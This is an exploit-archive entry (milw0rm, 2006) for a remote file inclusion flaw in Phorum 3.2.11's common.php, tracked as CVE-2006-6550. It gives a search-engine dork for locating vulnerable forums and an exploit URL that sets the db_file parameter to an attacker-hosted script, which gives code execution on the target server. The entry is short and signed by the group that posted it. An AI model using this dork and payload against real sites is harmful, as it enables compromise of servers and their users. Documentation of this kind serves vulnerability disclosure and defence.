Phorum 3.2.11 - 'common.php' Remote File Inclusion



EKU-ID: 10880 CVE: OSVDB-35754;CVE-2006-6550 OSVDB-ID:
Author: Mr-m07 Published: 2006-12-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


===========================================================
Yee7TeaM

WwW.Yee7.CoM
===========================================================

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Download: http://skrypty.webpc.pl/pobierz274.html

Dork: "Copyright (C) 2000  Phorum Development Team"  and back form doc
folder :)

Description:

Line 31 of common.php

>
>>  // $db_file = './db/postgresql65.php';
>

Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]


===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================

# milw0rm.com [2006-12-06]